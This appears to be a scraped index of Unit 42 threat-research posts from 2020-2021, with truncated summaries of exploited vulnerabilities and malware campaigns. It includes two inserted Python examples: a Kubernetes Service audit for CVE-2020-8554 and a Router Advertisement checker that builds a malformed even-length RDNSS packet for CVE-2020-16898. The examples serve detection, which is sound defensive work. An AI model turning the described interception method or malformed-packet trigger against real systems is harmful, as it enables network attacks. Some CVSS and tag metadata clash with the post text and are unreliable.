blogs_unit42·2021-08-30·CVSS 9.8·CVE-2021-32305 [CRITICAL]
Brock Mammen
Haozhe Zhang
Published: August 30, 2021
Threat Research
Vulnerabilities
Botnet
CVE-2021-32305
DDoS
WebSVN
## Executive Summary
We have observed exploits in the wild for a recently disclosed command injection vulnerability affecting WebSVN, an open-source web application for browsing source code. The critical command injection vulnerability was discovered and patched in May 2021. A proof of concept was released and within a week, on June 26, 2021, attackers exploited the vulnerability to deploy variants of the Mirai DDoS malware. We strongly recommend that WebSVN users upgrade to the latest software version.
Palo Alto Net
Unit42
## New eCh0raix Ransomware Variant Targets QNAP and Synology Network-Attached Storage Devices
blogs_unit42·2021-08-10·CVSS 10.0·CVE-2021-28799 [CRITICAL]
Ruchna Nigam
Haozhe Zhang
Zhibin Zhang
Published: August 10, 2021
Ransomware
Threat Research
Vulnerabilities
CVE-2021-28799
ECh0raix
IoT
NAS
QNAPCrypt
SOHO
## Executive Summary
Unit 42 researchers have discovered a new variant of eCh0raix ransomware targeting Synology network-attached storage (NAS) and Quality Network Appliance Provider (QNAP) NAS devices. To achieve this, attackers are also leveraging CVE-2021-28799 to deliver the new eCh0raix ransomware variant to QNAP devices. While eCh0raix is known ransomware that has historically targeted QNAP and Synology NAS devices in separate campaigns, this new variant is the first
Unit42
## Palo Alto Networks Discloses New Attack Surface Targeting Microsoft IIS and SQL Server at Black Hat Asia 2021
blogs_unit42·2021-07-30
Tao Yan
Qi Deng
Bo Qu
Zhibin Zhang
Published: July 30, 2021
Threat Research
Vulnerabilities
Attack surface
Black Hat
Exploit
IIS
JET
SQL
## Executive Summary
Unit 42 recently shared information about a new attack surface targeting Microsoft Internet Information Services (IIS) and SQL Server at Black Hat Asia 2021. In our presentation, we introduced a previously undisclosed technique to execute SQL queries on the remote database in IIS and SQL Server under SQL injection or ad hoc scenarios. We also discussed three typical cases picked from around 100 Jet vulnerabilities that we discovered in a three-mon
Unit42
## Threat Brief: Windows Print Spooler RCE Vulnerability (CVE-2021-34527 AKA PrintNightmare)
blogs_unit42·2021-07-14·CVSS 7.8·CVE-2021-34527 [HIGH]
Unit 42
Published: July 14, 2021
High Profile Threats
Vulnerabilities
CVE-2021-1675
CVE-2021-34527
PrintNightmare
Remote Code Execution
Windows
## Executive Summary
On July 1, 2021, Microsoft released a security advisory for a new remote code execution (RCE) vulnerability in Windows, CVE-2021-34527, referred to publicly as "PrintNightmare." Security researchers initially believed this vulnerability to be tied to CVE-2021-1675 (Windows Print Spooler Remote Code Execution Vulnerability), which was first disclosed in the Microsoft Patch Tuesday release on June 8, 2021. Microsoft has since updated the FAQ section of the advis
Unit42
## Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Yue Guan
Lei Xu
Vaibhav Singhal
Brock Mammen
Published: July 1, 2021
Trend Reports
Vulnerabilities
Network security trends
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of
Unit42
## What Can You Learn From a “Wiped” Computer With Digital Forensics?
blogs_unit42·2021-05-27
Michael Savitz
Published: May 27, 2021
Threat Research
Vulnerabilities
Exposed data
Insider threats
Wiped
## Executive Summary
It’s easy to assume deleting data from a computer is comparable to burning paper documents – what’s gone is gone. But is it?
There are many scenarios in which individuals would like data to be truly gone, potentially to hide a trail of criminal behavior. Yet others hope it’s recoverable, perhaps to piece together a trail of evidence.
Consider the following scenario:
An employee resigns and joins a competitor working on a similar product. The company suspects the employee shared proprietary information with her new company b
Unit42
## Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials
blogs_unit42·2021-04-15·CVSS 9.1·CVE-2021-26855 [CRITICAL]
Robert Falcone
Published: April 15, 2021
Threat Research
Vulnerabilities
Credential Harvesting
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
Microsoft Exchange Server
Webshell
## Executive Summary
The recently discovered and patched Microsoft Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065) have garnered considerable attention due to their mass exploitation and the severity of impact each exploitation has on the affected organization. On March 6, 2021, an unknown actor exploited vulnerabilities in Microsoft Exchange Server to install a webshell on a se
Unit42
## Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
blogs_unit42·2021-04-15·CVSS 8.8·CVE-2021-25296 [HIGH]
Haozhe Zhang
Vaibhav Singhal
Zhibin Zhang
Qi Deng
Published: April 15, 2021
Threat Research
Vulnerabilities
Command injection
Cryptocurrency mining
Cryptojacking
CVE-2021-25296
Nagios
XMRig
## Executive Summary
On March 16, 2021, Unit 42 researchers observed an attacker targeting Nagios XI software to exploit the vulnerability CVE-2021-25296, a remote command injection vulnerability impacting Nagios XI version 5.7.5, to conduct a cryptojacking attack and deploy the XMRig coinminer on victims’ devices. At the time of writing, the attack is still ongoing.
Nagios XI is a widely-used software that provides enterprise server and network m
Unit42
## New Vulnerability Affecting Container Engines CRI-O and Podman (CVE-2021-20291)
blogs_unit42·2021-04-14·CVSS 6.5·CVE-2021-20291 [MEDIUM]
Aviv Sasson
Published: April 14, 2021
Threat Research
Vulnerabilities
Containers
CRI-O
CVE-2021-20291
Kubernetes
Podman LXC Container Security
## Executive Summary
As part of our initiative to improve security in the cloud-native landscape, I conducted a security audit of multiple Go libraries that Kubernetes is based on. In my research, I found CVE-2021-20291 in containers/storage that leads to a Denial of Service (DoS) of the container engines CRI-O and Podman when pulling a malicious image from a registry. Through this vulnerability, malicious actors could jeopardize any containerized infrastructure that relies on these vulnerable co
Unit42
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5 [HIGH]
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519 and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to earl
## Unit 42 Discovers 15 New Vulnerabilities Across Microsoft, Adobe and Apple Products
blogs_unit42·2021-03-19·CVSS 7.1
Bo Qu
Published: March 19, 2021
Threat Research
Vulnerabilities
Adobe
Apple
Black Hat
Microsoft
Microsoft Security Response Center (MSRC)
MSRC
Privilege escalation
Remote Code Execution
## Executive Summary
Unit 42 researchers have been credited with discovering 15 new vulnerabilities addressed by the Microsoft Security Response Center (MSRC), Adobe Security Bulletin and Apple Security Updates, as part of the last quarter of security update releases.
## Vulnerabilities
Of the 15 new vulnerabilities credited to Unit 42 researchers, 10 come from Microsoft with severity ratings from low to important. The four Adobe Reader DC v
## Satori: Mirai Botnet Variant Targeting Vantage Velocity Field Unit RCE Vulnerability
blogs_unit42·2021-03-17·CVSS 9.8
Haozhe Zhang
Vaibhav Singhal
Zhibin Zhang
Jun Du
Published: March 17, 2021
Threat Research
Vulnerabilities
Botnet
CVE-2020-9020
IoT
Mirai variant
## Executive Summary
On Feb. 20, 2021, Unit 42 researchers observed attempts to exploit CVE-2020-9020, which is a Remote Command Execution (RCE) vulnerability in Iteris’ Vantage Velocity field unit versions 2.3.1, 2.4.2 and 3.0. As a travel data measurement system, Vantage Velocity captures travel data from a large number of vehicles. If a device is compromised, it will be under the control of attackers, who can then leak sensitive data or conduct further attacks, such as Distributed Denial
## New Mirai Variant Targeting Network Security Devices
blogs_unit42·2021-03-16·CVSS 7.5
Vaibhav Singhal
Ruchna Nigam
Zhibin Zhang
Asher Davila
Published: March 15, 2021
Threat Research
Vulnerabilities
CVE-2019-19356
CVE-2020-25506
CVE-2020-26919
CVE-2021-22502
CVE-2021-27561
CVE-2021-27562
IoT
Mirai
VisualDoor
## Executive Summary
On Feb. 16, 2021, Unit 42 researchers discovered attacks leveraging a number of vulnerabilities, including:
VisualDoor (a SonicWall SSL-VPN exploit).
CVE-2020-25506 (a D-Link DNS-320 firewall exploit).
CVE-2020-26919 (a Netgear ProSAFE Plus exploit).
Possibly CVE-2019-19356 (a Netis WF2419 wireless router exploit).
Three other IoT vulnerabilities yet to be identified.
On Feb. 23, 2021, one of the IPs involved
## Microsoft Exchange Server Attack Timeline
blogs_unit42·2021-03-11·CVSS 9.1
Unit 42
Published: March 11, 2021
Malware
Threat Research
Vulnerabilities
CVE-2021-26855
CVE-2021-26857
CVE-2021-27065
Hafnium
Microsoft Exchange Server
## Executive Summary
On March 2, the world was introduced to four critical zero-day vulnerabilities impacting multiple versions of Microsoft Exchange Server (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065). Alongside revealing these vulnerabilities, Microsoft published security updates and technical guidance that stressed the importance of patching immediately, while concurrently noting active and ongoing exploitation by an Advanced Persistent Threat (APT) they call HAFNIUM. Since the initial attack
## Remediation Steps for the Microsoft Exchange Server Vulnerabilities
blogs_unit42·2021-03-09·CVSS 9.1
Unit 42
Published: March 9, 2021
Threat Research
Vulnerabilities
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
Microsoft Exchange Server
## Background
On March 2, the security community became aware of four critical zero-day Microsoft Exchange Server vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065).
These vulnerabilities let adversaries access Exchange Servers and potentially gain long-term access to victims’ environments. While the Microsoft Threat Intelligence Center (MSTIC) attributes the initial campaign with high confidence to HAFNIUM, a group they assess to be state-sponsored and operatin
## Overview of dnsmasq Vulnerabilities: The Dangers of DNS Cache Poisoning
blogs_unit42·2021-03-08
Daniel Prizmant
Published: March 8, 2021
DNS
Threat Research
Vulnerabilities
CoreDNS
Dnsmasq
History
Kube-dns
## Executive Summary
DNS masquerade (dnsmasq) is a widely used open source DNS resolver. While one might not be familiar with dnsmasq by name, it is used by many projects and hardware firmwares around the world, from Kubernetes to routers and other products.
Over the years, multiple critical vulnerabilities have been found in dnsmasq. Recently, security researchers discovered new issues that continue to make dnsmasq vulnerable. These vulnerabilities can lead to DNS cache poisoning, denial of service (DoS) and possibly remote code execution (RCE).
## Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells
blogs_unit42·2021-03-08·CVSS 7.8
Jeff White
Published: March 8, 2021
Threat Research
Vulnerabilities
China Chopper
CVE-2021-27065
Hafnium
Microsoft Exchange Server
## Executive Summary
Microsoft recently released patches for a number of zero-day Microsoft Exchange Server vulnerabilities that are actively being exploited in the wild by HAFNIUM, a suspected state-sponsored group operating out of China. We provide an overview of the China Chopper webshell, a backdoor which has been observed being dropped in these attacks. We also analyze incidental artifacts, such as metadata, created by the attacks themselves, which allow us to collect information and better understand
## Threat Assessment: Active Exploitation of Four Zero-Day Vulnerabilities in Microsoft Exchange Server
blogs_unit42·2021-03-03·CVSS 9.1
Unit 42
Published: March 3, 2021
High Profile Threats
Vulnerabilities
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
Exploits
Microsoft Exchange Server
Zero-day
## Executive Summary
On Mar. 2, 2021, Volexity reported in-the-wild exploitation of four Microsoft Exchange Server vulnerabilities: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.
As a result of these vulnerabilities being exploited, adversaries can access Microsoft Exchange Servers and allow installation of additional tools to facilitate long-term access into victims' environments. There has also been a report of m
## Threat Brief: Kerberos KDC Security Feature Bypass Vulnerability (CVE-2020-17049 AKA Bronze Bit)
blogs_unit42·2021-03-03·CVSS 6.6
Aviad Meyer
Liav Zigelbaum
Published: March 3, 2021
High Profile Threats
Vulnerabilities
CVE-2020-17049
Kerberos
## Executive Summary
A recent vulnerability in the Kerberos authentication protocol, CVE-2020-17049 (dubbed Bronze Bit), has been disclosed by Microsoft. The vulnerability is in the way that the Key Distribution Center (KDC) handles service tickets and validates whether delegation is allowed.
In the attack, as detailed in the Palo Alto Networks Security Operations blog, “Protecting Against the Bronze Bit Vulnerability with Cortex XDR,” the attacker tampers with the Kerberos service ticket, which allow
## Threat Brief: Windows IPv4 and IPv6 Stack Vulnerabilities (CVE-2021-24074, CVE-2021-24086 and CVE-2021-24094)
blogs_unit42·2021-02-09·CVSS 9.8
Abisheik Ganesan
Published: February 9, 2021
High Profile Threats
Vulnerabilities
CVE-2021-24074
CVE-2021-24086
CVE-2021-24094
Microsoft
Windows
## Executive Summary
For Microsoft’s Patch Tuesday for February 2021, the company released patches for 56 disclosed vulnerabilities, which include:
CVE-2021-24086 and CVE-2021-24094 : Two denial-of-service (DoS) vulnerabilities in the Windows IPv6 stack.
CVE-2021-24074 : Remote code execution (RCE) vulnerability in the Windows IPv4 stack.
CVE-2021-24086 was given the Common Vulnerability Scoring System (CVSS) score of 7.5/6.5 and an "Important" security rat
## Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
blogs_unit42·2021-02-05·CVSS 5.4
Nadav Markus
Efi Barkayev
Gal De Leon
Published: February 5, 2021
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
CVE-2020-25213
Kinsing
Remote Code Execution
WordPress
## Executive Summary
In December 2020, Unit 42 researchers observed attempts to exploit CVE-2020-25213, which is a file upload vulnerability in the WordPress File Manager plugin. Successful exploitation of this vulnerability allows an attacker to upload an arbitrary file with arbitrary names and extensions, leading to Remote Code Execution (RCE) on the targeted web server.
This exploit was used by attackers to install webshells, which in turn
## Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concern
## The History of DNS Vulnerabilities and the Cloud
blogs_unit42·2020-12-28
Daniel Prizmant
Published: December 28, 2020
Threat Research
Vulnerabilities
DNS cache poisoning
## Introduction
Every now and then, a new domain name system (DNS) vulnerability that puts billions of devices around the world at risk is discovered. DNS vulnerabilities are usually critical. Just imagine that you browse to your bank account website, but instead of returning the IP address of your bank website, your DNS resolver gives you the address of an attacker’s website. That website looks exactly the same as the bank’s website. Not only that, but even if you take a look at the URL bar, you won’t see anything wrong because your browser actually thinks this is the websit
## SolarStorm Supply Chain Attack Timeline
blogs_unit42·2020-12-23
Unit 42
Published: December 23, 2020
High Profile Threats
Malware
Vulnerabilities
Software supply-chain attack
SolarStorm
SolarWinds
SUPERNOVA
Supply-chain attack
## Executive Summary
On Dec. 13, the cyber community became aware of one of the most significant cybersecurity events of our time, impacting both commercial and government organizations around the world. The event was a supply chain attack on SolarWinds Orion® software conducted by suspected nation-state operators that we are tracking as SolarStorm. Unit 42 was able to connect this event back to an attack we successfully prevented earlier this year. On Dec. 18, we launched a SolarStorm Rapid Assessment progra
## Protecting Against an Unfixed Kubernetes Man-in-the-Middle Vulnerability (CVE-2020-8554)
blogs_unit42·2020-12-21·CVSS 6.3
Yuval Avrahami
Published: December 21, 2020
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2020-8554
Kubernetes
## Executive Summary
On Dec. 4, 2020, the Kubernetes Product Security Committee disclosed a new Kubernetes vulnerability assigned CVE-2020-8554. It is a medium severity issue affecting all Kubernetes versions and is currently unpatched. CVE-2020-8554 is a design flaw that allows Kubernetes Services to intercept cluster traffic to any IP address. Users who can manage services can exploit the vulnerability to carry out man-in-the-middle (MITM) attacks against pods and nodes in the cluster.
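As an added example that is not from the Unit 42 post: the mechanism behind CVE-2020-8554 is that kube-proxy programs every node to forward traffic destined for any address listed in a Service's `spec.externalIPs` (and, for a `type: LoadBalancer` Service, any address written into `status.loadBalancer.ingress`) to that Service's backends. A user who can create or patch Services can therefore list an in-cluster address that other workloads already talk to, such as the cluster DNS Service, and receive that traffic. The Python script below audits a Service list for both shapes. The Service objects are constructed to stand in for `kubectl get svc -A -o json`; the Service and Pod CIDRs 10.96.0.0/12 and 10.244.0.0/16, the cluster DNS address 10.96.0.10 and the other addresses are assumed values for a hypothetical cluster.

```python
import ipaddress
import json

# Constructed sample standing in for `kubectl get svc -A -o json` on a hypothetical cluster.
SAMPLE_SERVICE_LIST = json.dumps({"items": [
    # Ordinary ClusterIP Service: nothing to report.
    {"metadata": {"namespace": "default", "name": "web"},
     "spec": {"type": "ClusterIP", "clusterIP": "10.96.12.3", "ports": [{"port": 80}]}},
    # externalIPs pointed at the (assumed) cluster DNS address: every node will now
    # forward pods' DNS queries to this Service's backends instead of CoreDNS.
    {"metadata": {"namespace": "dev", "name": "sneaky"},
     "spec": {"type": "ClusterIP", "clusterIP": "10.96.40.9",
              "externalIPs": ["10.96.0.10"], "ports": [{"port": 53}]}},
    # LoadBalancer Service whose status was patched to an in-cluster Pod address.
    {"metadata": {"namespace": "dev", "name": "fake-lb"},
     "spec": {"type": "LoadBalancer", "clusterIP": "10.96.40.10", "ports": [{"port": 443}]},
     "status": {"loadBalancer": {"ingress": [{"ip": "10.244.1.7"}]}}},
    # LoadBalancer Service with a public address assigned by the cloud controller.
    {"metadata": {"namespace": "prod", "name": "real-lb"},
     "spec": {"type": "LoadBalancer", "clusterIP": "10.96.50.1", "ports": [{"port": 443}]},
     "status": {"loadBalancer": {"ingress": [{"ip": "203.0.113.25"}]}}},
]})

# Assumed Service and Pod CIDRs of the hypothetical cluster; a legitimate cloud load
# balancer never gets an address inside these ranges.
INTERNAL_CIDRS = ("10.96.0.0/12", "10.244.0.0/16")


def _in_cidrs(ip, cidrs):
    """True if ip falls inside any of the given CIDR ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(cidr) for cidr in cidrs)


def audit_services(service_list_json, internal_cidrs=INTERNAL_CIDRS, allowed_external_ips=()):
    """Return (namespace/name, field, ip) for every Service able to intercept traffic.

    Any externalIPs entry not on an explicit allow list is reported, because kube-proxy
    routes traffic for that address regardless of who owns it. For LoadBalancer Services,
    an ingress address inside the cluster's own ranges is reported: status is normally
    written only by the cloud controller, so an internal address there means someone with
    services/status patch rights set it by hand.
    """
    findings = []
    for svc in json.loads(service_list_json).get("items", []):
        meta = svc.get("metadata", {})
        spec = svc.get("spec", {})
        ident = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"

        for ip in spec.get("externalIPs", []):
            if ip not in allowed_external_ips:
                findings.append((ident, "spec.externalIPs", ip))

        if spec.get("type") == "LoadBalancer":
            ingress = svc.get("status", {}).get("loadBalancer", {}).get("ingress", [])
            for entry in ingress:
                ip = entry.get("ip")
                if ip and _in_cidrs(ip, internal_cidrs):
                    findings.append((ident, "status.loadBalancer.ingress", ip))
    return findings


if __name__ == "__main__":
    for ident, field, ip in audit_services(SAMPLE_SERVICE_LIST):
        print(f"{ident}: {field} = {ip} can intercept cluster traffic")
```

Run the same function on real output from `kubectl get svc -A -o json`, passing your own CIDRs and any externalIPs your platform team deliberately uses; an admission policy that rejects `spec.externalIPs` outright is the stronger control, and this audit catches Services created before such a policy was in place.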
## Threat Brief: FireEye Red Team Tool Breach
blogs_unit42·2020-12-11
Unit 42
Published: December 10, 2020
High Profile Threats
Malware
Vulnerabilities
FireEye breach
## Executive Summary
On Dec. 8, 2020, one of the leading cybersecurity companies in the industry, FireEye, reported a breach and data exfiltration unlike any that we have seen previously. What makes this attack unique is not only the target, FireEye being a well-known cybersecurity company, but that the stolen data contains the internal, custom-crafted red-team and penetration testing tools used by the company to imitate different threat actors during customer security consultations. FireEye’s blog provided a wealth of information for defenders to implement security controls
## PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL
blogs_unit42·2020-12-10·CVSS 7.2
Xiao Zhang
Yang Ji
Jim Fitzgerald
Yue Chen
Claud Xiao
Published: December 10, 2020
Malware
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
Exploit
PostgreSQL
## Executive Summary
Cryptojacking (or simply malicious coin mining) is a common way for malware authors to monetize their operations. While the underlying mining protocols and techniques remain fairly standard, malware actors tend to seek out and find smarter ways to hack into a victim's machines. Recently, Unit 42 researchers uncovered a novel Linux-based cryptocurrency mining botnet that exploits a disputed PostgreSQL remote code execution (RCE) vulnerability that compromises
## Threat Brief: VMware Command Injection Vulnerability (CVE-2020-4006)
blogs_unit42·2020-12-10·CVSS 9.1
Shawn Westfall
Published: December 9, 2020
High Profile Threats
Vulnerabilities
CVE-2020-4006
VMware
## Executive Summary
On Dec. 7, 2020, the National Security Agency (NSA) published a cybersecurity advisory indicating they observed Russian state-sponsored actors exploiting a VMware command injection vulnerability (CVE-2020-4006). VMware issued a patch for the vulnerability on Dec. 3, 2020. The vulnerability affects the following VMware products:
VMware Access® 20.01 and 20.10 on Linux®
VMware vIDM® 3.3.1, 3.3.2 and 3.3.3 on Linux
VMware vIDM Connector 3.3.1, 3.3.2, 3.3.3, 19.03
VMware Cloud Foundation® 4.x
VMware vRealize Suite Lifecy
## Exploitation of Windows RDP Vulnerability CVE-2019-0708 (BlueKeep): Get RCE with System Privilege Using Refresh Rect PDU and RDPDR Client Name Request PDU
blogs_unit42·2020-12-07·CVSS 9.8
Tao Yan
Jin Chen
Published: December 7, 2020
Threat Research
Vulnerabilities
Bluekeep
CVE-2019-0708
RDP
Remote Code Execution
## Executive Summary
In May 2019, Microsoft released an out-of-band patch update for remote code execution (RCE) vulnerability CVE-2019-0708, which is also known as “BlueKeep” and resides in code for Remote Desktop Services (RDS). Over the last year, researchers had proved the exploitability of BlueKeep and proposed countermeasures to detect and prevent it. However, RDP is still one of the most popular attack vectors used by attackers toda
## Windows XP, Server 2003 Source Code Leak Leaves IoT, OT Devices Vulnerable
blogs_unit42·2020-11-06
Jun Du
Derick Liang
Aveek Das
Published: November 6, 2020
Threat Research
Vulnerabilities
IoT
Windows Server
Windows XP
## Executive Summary
On Sept. 24, 2020, the source code for Windows XP and Windows Server 2003 was leaked and posted on several file-sharing sites such as Mega and 4Chan. Microsoft ended support for Windows XP when it reached its end-of-support date in 2014 and for Windows Server 2003 in 2015. Therefore, any vulnerabilities discovered since then remain unaddressed (with the exception of a patch in 2017 for the WannaCry attack). Although the leaked Windows XP source code might have circulated privately even earlier, the rece
## Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
Threat Research
Vulnerabilities
IoT
Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While t
## Threat Brief: Microsoft Vulnerability CVE-2020-16898
blogs_unit42·2020-10-14·CVSS 8.8
Mike Harbison
Brandon Young
Published: October 14, 2020
High Profile Threats
Vulnerabilities
Bad Neighbor
CVE-2020-16898
Microsoft
## Executive Summary
In October 2020, during Microsoft’s Patch Tuesday, a security update (CVE-2020-16898) addressed a critical vulnerability discovered in IPv6 Router Advertisement Options (called “DNS RA options”). This vulnerability resides within the Windows TCP/IP stack that is responsible for handling RA packets. Current exploitation leads to a Denial of Service (DoS) with the possibility of remote code execution.
This vulnerability affects multiple Windows versions that support IPv6 RDNSS, which was added to Windows star
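As an added example that is not part of the Unit 42 brief: the RDNSS option the brief refers to is Neighbor Discovery option type 25 (RFC 8106). Its Length field counts 8-byte units, and a well-formed option has an odd Length of at least 3, because a one-unit header (type, length, reserved, lifetime) is followed by two units per IPv6 address. The published detection guidance for CVE-2020-16898 is to flag Router Advertisements carrying an RDNSS option with an even Length, which is the malformed shape a vulnerable stack mis-parses. The Python below walks the option list of an ICMPv6 Router Advertisement payload and reports such options. Both packets are constructed inline; the 2001:db8:: addresses, lifetimes and prefix are sample values.

```python
import socket
import struct

ND_ROUTER_ADVERT = 134   # ICMPv6 type: Router Advertisement
OPT_PREFIX_INFO = 3      # ND option: Prefix Information (always 4 units = 32 bytes)
OPT_RDNSS = 25           # ND option: Recursive DNS Server, RFC 8106
RA_HEADER_LEN = 16       # ICMPv6 RA header preceding the option list


def build_rdnss_option(addresses, lifetime=3600, length_units=None):
    """Build an RDNSS option; length_units overrides the correct computed Length."""
    body = struct.pack("!HI", 0, lifetime) + b"".join(addresses)
    if length_units is None:
        length_units = 1 + 2 * len(addresses)   # header unit + two units per address
    return struct.pack("!BB", OPT_RDNSS, length_units) + body


def build_prefix_info_option(prefix, prefix_len=64):
    """Build a Prefix Information option (type, len=4, prefix len, L+A flags, lifetimes, reserved, prefix)."""
    return struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, prefix_len, 0xC0, 86400, 14400, 0) + prefix


def build_ra(options):
    """Build an RA payload: type, code, checksum (left 0), hop limit, flags, router lifetime, reachable, retrans."""
    header = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0)
    return header + b"".join(options)


def check_ra_options(payload):
    """Walk the ND options of an RA and return a list of reasons the packet is malformed."""
    findings = []
    if len(payload) < RA_HEADER_LEN or payload[0] != ND_ROUTER_ADVERT:
        return ["not a Router Advertisement"]
    off = RA_HEADER_LEN
    while off + 2 <= len(payload):
        otype, olen = payload[off], payload[off + 1]
        if olen == 0:   # RFC 4861 forbids zero-length options; stop rather than spin
            findings.append(f"option type {otype} at offset {off} has length 0")
            break
        if otype == OPT_RDNSS and (olen < 3 or olen % 2 == 0):
            findings.append(
                f"RDNSS option at offset {off} has invalid length {olen} (must be odd and >= 3)")
        size = olen * 8
        if off + size > len(payload):
            findings.append(f"option type {otype} at offset {off} runs past end of packet")
            break
        off += size
    return findings


# Constructed sample packets (addresses and prefix from the 2001:db8::/32 documentation range).
_DNS = socket.inet_pton(socket.AF_INET6, "2001:db8::53")
_PREFIX = socket.inet_pton(socket.AF_INET6, "2001:db8:1::")

# Well-formed RA: one RDNSS address (Length 3) followed by a Prefix Information option.
GOOD_RA = build_ra([build_rdnss_option([_DNS]), build_prefix_info_option(_PREFIX)])

# Malformed RA: RDNSS declares Length 4 (even) and carries one full address plus 8 stray
# bytes, so a parser that trusts Length to count addresses reads a half address that
# overlaps the following option.
BAD_RA = build_ra([build_rdnss_option([_DNS, b"\x00" * 8], length_units=4),
                   build_prefix_info_option(_PREFIX)])

if __name__ == "__main__":
    print("good RA:", check_ra_options(GOOD_RA) or "no findings")
    print("bad RA: ", check_ra_options(BAD_RA))
```

The check is deliberately limited to the option framing, since that is what distinguishes the malformed packet; feeding captured ICMPv6 payloads (everything after the IPv6 header) to `check_ra_options` is enough to spot hosts on a segment that are sending the even-length variant.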
## CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel
blogs_unit42·2020-10-10·CVSS 7.8
Or Cohen
Published: October 9, 2020
Threat Research
Vulnerabilities
CVE-2020-14386
Linux
Privilege escalation
## Executive Summary
Lately, I’ve been investing time into auditing packet sockets source code in the Linux kernel. This led me to the discovery of CVE-2020-14386, a memory corruption vulnerability in the Linux kernel. Such a vulnerability can be used to escalate privileges from an unprivileged user into the root user on a Linux system. In this blog, I will provide a technical walkthrough of the vulnerability, how it can be exploited and how Palo Alto Networks customers are protected.
A few years ago, several vulnerabilities were discove
## Unit 42 Discovers 27 New Vulnerabilities Across Microsoft Products
blogs_unit42·2020-10-02·CVSS 7.8
John Harrison
Published: October 2, 2020
Threat Research
Vulnerabilities
Microsoft
Microsoft Security Response Center
Microsoft Security Response Center (MSRC)
Privilege escalation
Remote Code Execution
## Overview
Palo Alto Networks Unit 42 threat researchers have been credited with discovering 27 new vulnerabilities addressed by the Microsoft Security Response Center (MSRC), as part of its last nine months of security update releases.
## Vulnerabilities
The Microsoft vulnerabilities discovered included 27 vulnerabilities rated “important,” including Remote Code Execution, Privilege Elevation, Information Disclosure and one Denial of Service v
## Threat Brief: Microsoft Vulnerability CVE-2020-1472 “Zerologon”
blogs_unit42·2020-09-17·CVSS 5.5
Brandon Young
Mike Harbison
Published: September 17, 2020
High Profile Threats
Vulnerabilities
CVE-2020-1472
Zerologon
## Executive Summary
In August 2020, Microsoft released a security update, CVE-2020-1472 | Netlogon Elevation of Privilege Vulnerability, for a new elevation of privilege (EoP) vulnerability also known as "Zerologon." This vulnerability was given the highest Common Vulnerability Scoring System (CVSS) score of 10.0 and given a “critical” security rating from Microsoft.
This vulnerability exists within the Netlogon protocol. Exploitation of this vulnerability is possible due to a flaw in the implementation of the Netlogon protocol
## Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits (May-July 2020)
blogs_unit42·2020-09-15·CVSS 9.8
Brock Mammen
Yue Guan
Yu Fu
Published: September 15, 2020
Trend Reports
Vulnerabilities
CVE-2021-24074
CVE-2021-24086
CVE-2021-24094
Microsoft
Windows
## Executive Summary
From May 1-July 21, 2020, Unit 42 researchers captured global network traffic from firewalls around the world and then analyzed the data to examine the latest network attack trends. The majority of attacks we observed were classified as high severity (56.7%), and nearly one quarter (23%) were classified as critical. The most common vulnerabilities exploited were CVE-2012-2311 and CVE-2012-1823, both command injection vulnerabilities in PHP CGI scripts
